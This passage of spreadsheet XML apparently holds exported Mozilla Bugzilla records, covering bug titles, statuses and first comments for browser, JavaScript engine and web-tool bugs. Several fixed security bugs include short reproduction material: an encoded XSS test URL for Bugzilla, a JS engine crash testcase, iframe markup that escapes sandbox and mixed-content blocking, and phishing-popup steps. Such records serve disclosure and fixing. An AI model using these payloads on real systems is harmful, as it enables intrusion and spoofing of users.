      </c>
      <c r="H4704" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4704" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J4704" t="inlineStr">
        <is>
          <t>RSS Discovery and Preview</t>
        </is>
      </c>
      <c r="K4704" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4704" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4704" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4704" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4704" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4704" t="inlineStr">
        <is>
          <t>[sg:critical][partially fixed by bug 479560]</t>
        </is>
      </c>
      <c r="Q4704" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4704" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4704" t="inlineStr">
        <is>
          <t>Firefox 3.6a1</t>
        </is>
      </c>
      <c r="T4704" t="n">
        <v>1</v>
      </c>
      <c r="U4704" t="n">
        <v>0</v>
      </c>
      <c r="V4704" t="n">
        <v>69</v>
      </c>
      <c r="W4704" t="inlineStr">
        <is>
          <t>This is the same issue as bug 352124.
onPageChanged() method accepts an untrusted JS object as aURI, thus, it's
possible to run arbitrary code with chrome privileges in the same way as bug
352124.
fx2 is not affected, since only trunk and fx3.0.x have onPageChanged() method.</t>
        </is>
      </c>
      <c r="X4704" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4705">
      <c r="A4705" t="n">
        <v>893851</v>
      </c>
      <c r="B4705" t="inlineStr">
        <is>
          <t>2013-07-15 09:26:08 -0700</t>
        </is>
      </c>
      <c r="C4705" t="inlineStr">
        <is>
          <t>Pulsetranslator doesn't recover from server shutdown</t>
        </is>
      </c>
      <c r="D4705" t="inlineStr">
        <is>
          <t>2014-03-06 22:39:30 -0800</t>
        </is>
      </c>
      <c r="E4705" t="n">
        <v>1</v>
      </c>
      <c r="F4705" t="n">
        <v>1</v>
      </c>
      <c r="G4705" t="n">
        <v>4</v>
      </c>
      <c r="H4705" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4705" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J4705" t="inlineStr">
        <is>
          <t>Pulse</t>
        </is>
      </c>
      <c r="K4705" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4705" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4705" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4705" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4705" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4705" t="inlineStr">
        <is>
          <t>[qa-automation-blocked]</t>
        </is>
      </c>
      <c r="Q4705" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4705" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4705" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4705" t="n">
        <v>1</v>
      </c>
      <c r="U4705" t="n">
        <v>0</v>
      </c>
      <c r="V4705" t="n">
        <v>28</v>
      </c>
      <c r="W4705" t="inlineStr">
        <is>
          <t>This weekend, pulse was shutdown as part of datacenter maintenance; when it went down, it took pulsetranslator with it:
Error occurred during pulse.listen()
Traceback (most recent call last):
  File "/home/webtools/apps/pulsetranslator/src/pulsetranslator/pulsetranslator/pulsetranslator.py", line 70, in start
    pulse.listen()
  File "build/bdist.linux-x86_64/egg/mozillapulse/consumers.py", line 136, in listen
    self.consumer.wait()
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/carrot-0.10.7-py2.6.egg/carrot/messaging.py", line 446, in wait
    it.next()
  File "/home/webtools/apps/pulsetranslator/lib/python2.6/site-packages/carrot-0.10.7-py2.6.egg/carrot/backends/pyamqplib.py", line 300, in consume
    self.channel.wait()
  File "build/bdist.linux-x86_64/egg/amqplib/client_0_8/abstract_channel.py", line 95, in wait
    self.channel_id, allowed_methods)
  File "build/bdist.linux-x86_64/egg/amqplib/client_0_8/connection.py", line 231, in _wait_method
    self.wait()
  File "build/bdist.linux-x86_64/egg/amqplib/client_0_8/abstract_channel.py", line 97, in wait
    return self.dispatch_method(method_sig, args, content)
  File "build/bdist.linux-x86_64/egg/amqplib/client_0_8/abstract_channel.py", line 115, in dispatch_method
    return amqp_method(self, args)
  File "build/bdist.linux-x86_64/egg/amqplib/client_0_8/connection.py", line 380, in _close
    raise AMQPConnectionException(reply_code, reply_text, (class_id, method_id))
AMQPConnectionException: (320, u"CONNECTION_FORCED - broker forced connection closure with reason 'shutdown'", (0, 0), '')</t>
        </is>
      </c>
      <c r="X4705" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4706">
      <c r="A4706" t="n">
        <v>655660</v>
      </c>
      <c r="B4706" t="inlineStr">
        <is>
          <t>2011-05-09 00:30:50 -0700</t>
        </is>
      </c>
      <c r="C4706" t="inlineStr">
        <is>
          <t>Firefox 4 crashing when I try to delete emails using Yahoo! Mail Beta [@ js::mjit::JaegerShot ]</t>
        </is>
      </c>
      <c r="D4706" t="inlineStr">
        <is>
          <t>2024-05-29 15:55:34 -0700</t>
        </is>
      </c>
      <c r="E4706" t="n">
        <v>1</v>
      </c>
      <c r="F4706" t="n">
        <v>1</v>
      </c>
      <c r="G4706" t="n">
        <v>3</v>
      </c>
      <c r="H4706" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4706" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4706" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4706" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L4706" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4706" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4706" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4706" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4706" t="inlineStr">
        <is>
          <t>[sg:critical][fixed-in-tracemonkey][qa-]</t>
        </is>
      </c>
      <c r="Q4706" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4706" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4706" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4706" t="n">
        <v>1</v>
      </c>
      <c r="U4706" t="n">
        <v>0</v>
      </c>
      <c r="V4706" t="n">
        <v>63</v>
      </c>
      <c r="W4706" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Build Identifier: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Whenever I try to delete emails from new Yahoo! Mail Beta the Firefox 4 is crashing.
Here are the crash reports
http://crash-stats.mozilla.com/report/index/bp-fcaf835d-74d6-4bf8-b743-ebc2b2110506
http://crash-stats.mozilla.com/report/index/bp-6febb105-15de-4187-aeca-dff462110506
http://crash-stats.mozilla.com/report/index/bp-7f1af8c4-fe1e-480e-a21a-6ef232110505
http://crash-stats.mozilla.com/report/index/bp-7dd5937e-58d3-4ac5-a0b7-e45532110505
http://crash-stats.mozilla.com/report/index/bp-9c1687b3-58dd-4109-8d90-e1c7e2110504
http://crash-stats.mozilla.com/report/index/bp-778685f4-0b0d-4c16-a6f5-667e72110505
Reproducible: Always
Steps to Reproduce:
1. Goto Yahoo! Mail Beta
2. Goto Inbox and try to delete emails by pressing delete key
3. Keep deleting and Firefox crashes</t>
        </is>
      </c>
      <c r="X4706" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4707">
      <c r="A4707" t="n">
        <v>355728</v>
      </c>
      <c r="B4707" t="inlineStr">
        <is>
          <t>2006-10-06 09:11:22 -0700</t>
        </is>
      </c>
      <c r="C4707" t="inlineStr">
        <is>
          <t>[SECURITY] XSS in the "id" parameter of showdependencygraph when "doall" is set</t>
        </is>
      </c>
      <c r="D4707" t="inlineStr">
        <is>
          <t>2006-10-15 03:01:54 -0700</t>
        </is>
      </c>
      <c r="E4707" t="n">
        <v>1</v>
      </c>
      <c r="F4707" t="n">
        <v>1</v>
      </c>
      <c r="G4707" t="n">
        <v>4</v>
      </c>
      <c r="H4707" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4707" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4707" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K4707" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L4707" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4707" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4707" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4707" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4707" t="inlineStr">
        <is>
          <t>[ready for 2.18.6][ready for 2.20.3][ready for 2.22.1][ready for 2.23.3]</t>
        </is>
      </c>
      <c r="Q4707" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4707" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4707" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T4707" t="n">
        <v>1</v>
      </c>
      <c r="U4707" t="n">
        <v>0</v>
      </c>
      <c r="V4707" t="n">
        <v>18</v>
      </c>
      <c r="W4707" t="inlineStr">
        <is>
          <t>Reported to support-bugzilla:
It looks like if you pass JavaScript in the 'id' parameter it gets
placed verbatim into the 'value' parameter of the 'id' input field.
I adapted a URL from their warning text to try to highlight the
problem:
showdependencygraph.cgi?doall=80000001&amp;id=%27%22%3E%3Cscript+id%3D%2280000000%22%3Ealert%28%22hi%21%22%29%3B%3C%2Fscript%3E+&amp;rankdir=80000001&amp;showsummary=%27+having+1%3D1-</t>
        </is>
      </c>
      <c r="X4707" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4708">
      <c r="A4708" t="n">
        <v>558618</v>
      </c>
      <c r="B4708" t="inlineStr">
        <is>
          <t>2010-04-10 21:13:00 -0700</t>
        </is>
      </c>
      <c r="C4708" t="inlineStr">
        <is>
          <t>TM: Crash [@ js_ValueToString] - Segfault when accessing out-of-range arguments on trace</t>
        </is>
      </c>
      <c r="D4708" t="inlineStr">
        <is>
          <t>2013-01-19 14:26:49 -0800</t>
        </is>
      </c>
      <c r="E4708" t="n">
        <v>1</v>
      </c>
      <c r="F4708" t="n">
        <v>1</v>
      </c>
      <c r="G4708" t="n">
        <v>3</v>
      </c>
      <c r="H4708" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4708" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4708" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4708" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4708" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4708" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4708" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4708" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4708" t="inlineStr">
        <is>
          <t>[sg:critical][ccbr] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q4708" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4708" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4708" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4708" t="n">
        <v>1</v>
      </c>
      <c r="U4708" t="n">
        <v>0</v>
      </c>
      <c r="V4708" t="n">
        <v>24</v>
      </c>
      <c r="W4708" t="inlineStr">
        <is>
          <t>/* vim: set ts=4 sw=4 tw=99 et: */
function f() {
    this.search = function(a, b, c) {
        arguments[3] = { }
        arguments.length = 4;
        for (var i = 0; i &lt; 100; i++) {
            print(arguments[3]);
        }
    }
}
var o = new f();
o.search({x: -1, y: -1, w: 100600, h: 100600});</t>
        </is>
      </c>
      <c r="X4708" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4709">
      <c r="A4709" t="n">
        <v>1551886</v>
      </c>
      <c r="B4709" t="inlineStr">
        <is>
          <t>2019-05-15 07:12:51 -0700</t>
        </is>
      </c>
      <c r="C4709" t="inlineStr">
        <is>
          <t>Opaque documents aren't considered in the mixed content blocker</t>
        </is>
      </c>
      <c r="D4709" t="inlineStr">
        <is>
          <t>2022-08-26 17:54:14 -0700</t>
        </is>
      </c>
      <c r="E4709" t="n">
        <v>1</v>
      </c>
      <c r="F4709" t="n">
        <v>1</v>
      </c>
      <c r="G4709" t="n">
        <v>3</v>
      </c>
      <c r="H4709" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4709" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4709" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K4709" t="inlineStr">
        <is>
          <t>65 Branch</t>
        </is>
      </c>
      <c r="L4709" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4709" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4709" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4709" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4709" t="inlineStr">
        <is>
          <t>[domsecurity-backlog1][post-critsmash-triage][adv-main92+]</t>
        </is>
      </c>
      <c r="Q4709" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4709" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4709" t="inlineStr">
        <is>
          <t>92 Branch</t>
        </is>
      </c>
      <c r="T4709" t="n">
        <v>1</v>
      </c>
      <c r="U4709" t="n">
        <v>0</v>
      </c>
      <c r="V4709" t="n">
        <v>20</v>
      </c>
      <c r="W4709" t="inlineStr">
        <is>
          <t>I raised Bug 1519406 about the mixed content blocker getting a `requestingLocation` that is a NullPrincipal. This principal doesn't appear to be handled correctly.
However it also seems that the way we evaluate if we should block is based only  on the parent context: https://searchfox.org/mozilla-central/rev/116bd975c30746ddefc3d20e6947d1871469354f/dom/security/nsMixedContentBlocker.cpp#733-751
So I was able to replicate the unblocked resources:
1. Go to https://example.com
2. Use inspector to inject `&lt;iframe src="data:text/html,&lt;iframe src='http://localhost'&gt;&lt;/iframe&gt;"&gt;&lt;/iframe&gt;` or `&lt;iframe src="data:text/html,&lt;iframe src='http://example.com'&gt;&lt;/iframe&gt;"&gt;&lt;/iframe&gt;`
In Firefox the inner frame loads and Chrome blocks this.</t>
        </is>
      </c>
      <c r="X4709" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4710">
      <c r="A4710" t="n">
        <v>475585</v>
      </c>
      <c r="B4710" t="inlineStr">
        <is>
          <t>2009-01-27 12:18:00 -0800</t>
        </is>
      </c>
      <c r="C4710" t="inlineStr">
        <is>
          <t>Re-seed Math.random() for each window/frame/context</t>
        </is>
      </c>
      <c r="D4710" t="inlineStr">
        <is>
          <t>2010-08-17 15:07:11 -0700</t>
        </is>
      </c>
      <c r="E4710" t="n">
        <v>1</v>
      </c>
      <c r="F4710" t="n">
        <v>1</v>
      </c>
      <c r="G4710" t="n">
        <v>3</v>
      </c>
      <c r="H4710" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4710" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4710" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4710" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4710" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4710" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4710" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4710" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4710" t="inlineStr">
        <is>
          <t>[sg:low], fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q4710" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4710" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4710" t="inlineStr">
        <is>
          <t>mozilla1.9.3a5</t>
        </is>
      </c>
      <c r="T4710" t="n">
        <v>1</v>
      </c>
      <c r="U4710" t="n">
        <v>1</v>
      </c>
      <c r="V4710" t="n">
        <v>36</v>
      </c>
      <c r="W4710" t="inlineStr">
        <is>
          <t>After discussion today, we agreed that it would be nice if each context got its own Math.random() seed, to reduce the risk of things like cross-site tracking based on randomness seed.</t>
        </is>
      </c>
      <c r="X4710" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4711">
      <c r="A4711" t="n">
        <v>822081</v>
      </c>
      <c r="B4711" t="inlineStr">
        <is>
          <t>2012-12-16 00:11:51 -0800</t>
        </is>
      </c>
      <c r="C4711" t="inlineStr">
        <is>
          <t>"Assertion failure: !comp-&gt;rt-&gt;isHeapBusy()" with about:memory and verifyprebarriers</t>
        </is>
      </c>
      <c r="D4711" t="inlineStr">
        <is>
          <t>2016-09-22 17:24:59 -0700</t>
        </is>
      </c>
      <c r="E4711" t="n">
        <v>1</v>
      </c>
      <c r="F4711" t="n">
        <v>1</v>
      </c>
      <c r="G4711" t="n">
        <v>3</v>
      </c>
      <c r="H4711" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4711" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4711" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4711" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4711" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4711" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4711" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4711" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4711" t="inlineStr">
        <is>
          <t>[adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q4711" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4711" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4711" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T4711" t="n">
        <v>1</v>
      </c>
      <c r="U4711" t="n">
        <v>0</v>
      </c>
      <c r="V4711" t="n">
        <v>27</v>
      </c>
      <c r="W4711" t="inlineStr">
        <is>
          <t>1. Create a new profile (mkdir -p ~/px/a; firefox -profile ~/px/a)
2. Install https://www.squarefree.com/extensions/domFuzzLite3.xpi
3. Load the testcase
Assertion failure: !comp-&gt;rt-&gt;isHeapBusy(), at js/src/vm/ObjectImpl-inl.h:395</t>
        </is>
      </c>
      <c r="X4711" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4712">
      <c r="A4712" t="n">
        <v>1521542</v>
      </c>
      <c r="B4712" t="inlineStr">
        <is>
          <t>2019-01-21 07:41:50 -0800</t>
        </is>
      </c>
      <c r="C4712" t="inlineStr">
        <is>
          <t>iframe sandbox can be escaped with rel=noopener/noreferrer when "allow-popups" specified, or in general with fission</t>
        </is>
      </c>
      <c r="D4712" t="inlineStr">
        <is>
          <t>2024-04-17 07:08:51 -0700</t>
        </is>
      </c>
      <c r="E4712" t="n">
        <v>1</v>
      </c>
      <c r="F4712" t="n">
        <v>1</v>
      </c>
      <c r="G4712" t="n">
        <v>3</v>
      </c>
      <c r="H4712" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4712" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4712" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K4712" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4712" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4712" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4712" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4712" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4712" t="inlineStr">
        <is>
          <t>[domsecurity-active][post-critsmash-triage][adv-main79+][adv-ESR78.1+]</t>
        </is>
      </c>
      <c r="Q4712" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4712" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4712" t="inlineStr">
        <is>
          <t>mozilla79</t>
        </is>
      </c>
      <c r="T4712" t="n">
        <v>1</v>
      </c>
      <c r="U4712" t="n">
        <v>0</v>
      </c>
      <c r="V4712" t="n">
        <v>36</v>
      </c>
      <c r="W4712" t="inlineStr">
        <is>
          <t>index.html:
```html
&lt;iframe srcdoc="&lt;a href=popup.html target=test rel=noreferrer&gt;Open a popup?&lt;/a&gt;" sandbox="allow-popups"&gt;&lt;/iframe&gt;
```
popup.html:
```html
&lt;script&gt; document.write("Origin: " + self.origin + "&lt;br&gt;Name:" + self.name); &lt;/script&gt;
```
I think ideally we'd ignore rel="noreferrer noopener" and create an auxiliary browsing context. Supporting non-auxiliary browsing contexts with inherited states seems like complexity that's better avoided, but perhaps there are some implications I haven't thought through.</t>
        </is>
      </c>
      <c r="X4712" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4713">
      <c r="A4713" t="n">
        <v>869036</v>
      </c>
      <c r="B4713" t="inlineStr">
        <is>
          <t>2013-05-06 08:55:50 -0700</t>
        </is>
      </c>
      <c r="C4713" t="inlineStr">
        <is>
          <t>[socorro-crashstats] Change label and size of the "build id" option in search</t>
        </is>
      </c>
      <c r="D4713" t="inlineStr">
        <is>
          <t>2013-05-13 08:28:11 -0700</t>
        </is>
      </c>
      <c r="E4713" t="n">
        <v>1</v>
      </c>
      <c r="F4713" t="n">
        <v>1</v>
      </c>
      <c r="G4713" t="n">
        <v>4</v>
      </c>
      <c r="H4713" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4713" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4713" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K4713" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4713" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4713" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4713" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4713" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4713" t="inlineStr"/>
      <c r="Q4713" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4713" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4713" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4713" t="n">
        <v>1</v>
      </c>
      <c r="U4713" t="n">
        <v>0</v>
      </c>
      <c r="V4713" t="n">
        <v>4</v>
      </c>
      <c r="W4713" t="inlineStr">
        <is>
          <t>Per a discussion with Peter on IRC, it appears it is unclear that the "build id" input accepts several values. We ought to add an "s" and make the input larger so users understand that they can fill several build ids in.</t>
        </is>
      </c>
      <c r="X4713" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4714">
      <c r="A4714" t="n">
        <v>1813463</v>
      </c>
      <c r="B4714" t="inlineStr">
        <is>
          <t>2023-01-30 00:31:18 -0800</t>
        </is>
      </c>
      <c r="C4714" t="inlineStr">
        <is>
          <t>Phishing site opens popup which falsely reports "This page is stored on your computer"</t>
        </is>
      </c>
      <c r="D4714" t="inlineStr">
        <is>
          <t>2024-06-02 11:56:52 -0700</t>
        </is>
      </c>
      <c r="E4714" t="n">
        <v>1</v>
      </c>
      <c r="F4714" t="n">
        <v>1</v>
      </c>
      <c r="G4714" t="n">
        <v>2</v>
      </c>
      <c r="H4714" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4714" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4714" t="inlineStr">
        <is>
          <t>Site Identity</t>
        </is>
      </c>
      <c r="K4714" t="inlineStr">
        <is>
          <t>Firefox 111</t>
        </is>
      </c>
      <c r="L4714" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M4714" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4714" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4714" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4714" t="inlineStr">
        <is>
          <t>[fixed in bug 1525943][adv-main122+][adv-esr115.7+]</t>
        </is>
      </c>
      <c r="Q4714" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4714" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4714" t="inlineStr">
        <is>
          <t>122 Branch</t>
        </is>
      </c>
      <c r="T4714" t="n">
        <v>1</v>
      </c>
      <c r="U4714" t="n">
        <v>0</v>
      </c>
      <c r="V4714" t="n">
        <v>46</v>
      </c>
      <c r="W4714" t="inlineStr">
        <is>
          <t>Created attachment 9314786
Popup window claiming site is local file
STR:
1. Set `browser.safebrowsing.phishing.enabled = false` to bypass the deceptive site warning.
2. Visit https://twitch.gift/csgo.
3. Click "Get free item".
4. Input code: "32TZA6NJQ".
5. Click "Enter".
6. Click "Take my prize".
Popup window opens login page for `steampowered.com`, address bar displays `https://twitch.gift/csgo` but the site icon shows a local file and reports:
    Site information for about:blank
    This page is stored on your computer.
Before the regression:
    Site information for about:blank
    Connection not secure
Regression window:
https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=f3a829091fef65cf49209ed374688cdd6d5753ed&amp;tochange=e33aea19d0c50b6b5eec8a45a8b21abcfdc79c85
Most likely regressed by Bug 1570678.</t>
        </is>
      </c>
      <c r="X4714" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4715">
      <c r="A4715" t="n">
        <v>1211414</v>
      </c>
      <c r="B4715" t="inlineStr">
        <is>
          <t>2015-10-05 04:26:20 -0700</t>
        </is>
      </c>
      <c r="C4715" t="inlineStr">
        <is>
          <t>[Meta] Interact directly with the DB instead of making HTTP requests to our own API</t>
        </is>
      </c>
      <c r="D4715" t="inlineStr">
        <is>
          <t>2016-07-27 02:18:19 -0700</t>
        </is>
      </c>
      <c r="E4715" t="n">
        <v>1</v>
      </c>
      <c r="F4715" t="n">
        <v>1</v>
      </c>
      <c r="G4715" t="n">
        <v>7</v>
      </c>
      <c r="H4715" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4715" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4715" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K4715" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4715" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4715" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4715" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4715" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4715" t="inlineStr"/>
      <c r="Q4715" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4715" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4715" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4715" t="n">
        <v>1</v>
      </c>
      <c r="U4715" t="n">
        <v>0</v>
      </c>
      <c r="V4715" t="n">
        <v>9</v>
      </c>
      <c r="W4715" t="inlineStr">
        <is>
          <t>Whilst it sounded all nice from a "we can have our ETL nodes running on a completely separate system" point of view, having the ETL tasks hit the external API rather than interacting with the DB directly adds additional load and means heavy-load issues with the API cause failure in our own ingestion, and not just external submitters.
IMO we should make as many of our internal tasks interact with the DB directly and not have the additional round-trip of hitting our webheads to go via the API.
We'll obviously need to make sure we still have enough tests for eg the python-client, since we'll not be using it internally, but IMO it will be worth it.
